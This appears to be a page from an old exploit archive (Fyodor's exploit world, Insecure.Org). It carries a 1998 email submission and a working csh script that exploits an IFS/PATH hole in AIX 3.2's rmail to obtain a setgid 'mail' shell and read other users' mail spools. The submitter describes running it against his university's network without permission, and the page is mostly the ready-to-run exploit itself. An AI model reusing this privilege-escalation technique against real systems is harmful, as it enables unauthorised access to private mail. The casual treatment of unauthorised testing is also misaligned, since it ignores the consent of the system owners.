AIX rmail hole
| Description: | IFS attack, apparently AIX may be using system() |
| Author: | Unknown |
| Compromise: | gid mail |
| Vulnerable Systems: | AIX 3.2, perhaps earlier |
| Date: | 10 May 1998 (it is actually much older) |
| Notes: | Thanks to the person who submitted this to me! |
Date: Sun, 10 May 1998 08:34:23 PDT
From: [ CUT ]
To: fyodor@nmap.org
Subject: AIX oldie
hi fyodor,
first let met tell you that your pages are great - but you already
know that, don't you?
i noticed you have an exploit section sorted by os; here's an oldie
but goodie for AIX boxes running 3.2, the exploit gives a gid of "mail"
and therefore enables you to read the contents of /var/spool/mail etc.
i successfully tested it under AIX 3.2.5 on my university's network,
which really brought me into some trouble ;)
i guess you probably know of this ancient IFS hole; just in case you
wanted to include it into your pages ...
cya & keep up the marvelous work,
[cut]
-----------snip------------
#!/bin/csh
# IFS hole in AIX3.2 rmail gives egid=mail.
# Setup needed files.
mkdir /tmp/.rmail
cd /tmp/.rmail
cat <usr
cp sh mailsh
chmod 2777 mailsh
EOF
chmod 777 usr
ln -s /bin/sh .
# Set PATH, IFS, and run rmail.
setenv PATH .:$PATH
setenv IFS /
echo "cheezy mail hack" | rmail joeuser@nohost.com
unsetenv IFS
rm -f usr sh # minor cleanup.
echo "Attempting to run sgid shell."
./mailsh
-----------snip------------
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
